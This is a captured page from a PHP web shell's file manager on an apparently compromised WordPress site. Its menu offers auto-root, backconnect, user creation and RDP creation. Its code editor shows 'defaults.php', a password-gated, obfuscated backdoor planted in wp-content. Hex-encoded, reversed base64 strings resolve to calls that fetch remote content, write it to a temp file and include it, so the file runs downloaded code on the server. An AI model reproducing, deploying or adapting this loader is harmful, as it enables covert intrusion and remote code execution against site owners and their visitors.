FreeBSD s15.mydevil.net 14.1-RELEASE-p4 FreeBSD 14.1-RELEASE-p4 #3 releng/14.1-n267709-86d01789bf41-dirty: Thu Sep 5 04:26:54 CEST 2024 root@pkg1.admin.net.pl:/usr/obj/usr/src/amd64.amd64/sys/devil amd64
Apache/N-G-I-N-X-htaccess-support
: 128.204.218.142 | : 18.188.231.128
Cant Read [ /etc/named.conf ]
?8.1.30
art
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
home /
art /
domains /
rotarycup.pl /
public_html /
wp-content /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
backups-dup-lite
[ DIR ]
drwxr-xr-x
?;
languages
[ DIR ]
drwxr-xr-x
?;
mu-plugins
[ DIR ]
drwxr-xr-x
?;
plugins
[ DIR ]
drwxr-xr-x
?;
themes
[ DIR ]
drwxr-xr-x
?;
upgrade
[ DIR ]
drwxr-xr-x
?;
upgrade-temp-backup
[ DIR ]
drwxr-xr-x
?;
uploads
[ DIR ]
drwxr-xr-x
defaults.php
3.06
KB
-r--r--r--
index.php
28
B
-rw-r--r--
item.php
28.35
KB
-r--r--r--
mah.php
8.47
KB
-r--r--r--
network.php
103.24
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : defaults.php
<?php ?><?php if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && md5(md5(md5(md5(md5(md5(md5(md5($_POST['pwdyt'])))))))) == '1ab4d6f8d41abab37e7a1b67a2469085') { $_SESSION['secretyt'] = true; } else { $bytesecform = <<<FORM <html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html> FORM; die($bytesecform); } } } ?> <?php $arr = array( "\x3D\x51\x44\x4D\x68\x56\x7A\x59\x6A\x4A\x57\x59\x6D\x56\x6A\x4D\x33\x63\x54\x59\x69\x46\x6A\x4D\x7A\x55\x54\x4E\x6B\x5A\x57\x4D\x35\x41\x7A\x4E\x6B\x4E\x32\x4D\x77\x55\x6A\x4D", // 0 "\x3D\x3D\x51\x5A\x73\x6C\x6D\x5A", // 1 "\x3D\x3D\x51\x5A\x73\x6C\x6D\x5A\x77\x31\x47\x64", // 2 "\x6C\x52\x58\x61\x79\x64\x6E\x5A", // 3 "\x53\x61\x6E\x74\x61\x69\x20\x44\x75\x6C\x75\x20\x47\x61\x6B\x20\x53\x69\x68", // 4 "\x3D\x45\x47\x64\x68\x52\x32\x58\x68\x52\x58\x5A\x74\x39\x46\x64\x6C\x64\x32\x58\x74\x46\x57\x5A\x79\x52\x33\x63", // 5 "\x6C\x4E\x33\x62\x73\x4E\x6D\x5A", // 6 "\x5A\x57\x52\x76\x59\x32\x56\x6B\x58\x7A\x51\x32\x5A\x58\x4E\x68\x59\x67\x3D\x3D", // 7 "\x42\x75\x73\x65\x74\x20\x6C\x75\x20\x62\x69\x73\x61\x20\x73\x61\x6E\x74\x61\x69\x20\x67\x61\x6B\x20\x73\x69\x68", // 8 "\x73\x74\x72\x72\x65\x76", // 9 "\x65\x64\x6F\x63\x65\x64\x5F\x34\x36\x65\x73\x61\x62", // 10 "\x6C\x78\x57\x61\x6D\x39\x46\x63\x74\x56\x47\x64", // 11 "\x6e\x42\x6e\x61\x75\x59\x57\x5a\x69\x56\x54\x4d\x79\x59\x57\x4d\x77\x63\x6a\x4e\x31\x30\x69\x4e\x69\x68\x54\x4f\x74\x45\x47\x4d\x35\x51\x54\x4c\x7a\x6b\x7a\x4e\x79\x30\x43\x4d\x78\x55\x6a\x59\x69\x42\x44\x4d\x7a\x30\x53\x4f\x79\x6b\x7a\x4e\x31\x41\x7a\x4e\x79\x49\x7a\x4c\x79\x41\x54\x4e\x7a\x63\x6a\x4e\x31\x41\x54\x4d\x76\x30\x32\x62\x6a\x35\x43\x64\x75\x56\x47\x64\x75\x39\x32\x59\x79\x56\x32\x63\x31\x4a\x57\x64\x6f\x52\x58\x61\x6e\x35\x79\x63\x6c\x64\x57\x59\x74\x6c\x57\x4c\x79\x56\x32\x63\x31\x39\x79\x4c\x36\x4d\x48\x63\x30\x52\x48\x61" // 12 ); $uu = $arr[9]($arr[9]($arr[10])($arr[7]))($arr[9]($arr[1]))($arr[9]($arr[10])($arr[9]($arr[12]))); foreach($uu as $aww){ $awww = $arr[9]($arr[9]($arr[10])($arr[7]))($aww); } $password = ""; // programmers $temp_file = $arr[9]($arr[9]($arr[10])($arr[7]))($arr[9]($arr[2]))(); $arr[9]($arr[9]($arr[10])($arr[7]))($arr[9]($arr[3]))($GLOBALS[$arr[9]($arr[10])($arr[9]($arr[11]))], $awww); include $arr[9]($arr[9]($arr[10])($arr[7]))($arr[9]($arr[5]))($GLOBALS[$arr[9]($arr[10])($arr[9]($arr[11]))])['uri']; $arr[9]($arr[9]($arr[10])($arr[7]))($arr[9]($arr[6]))($GLOBALS[$arr[9]($arr[10])($arr[9]($arr[11]))]); unset($array);
Close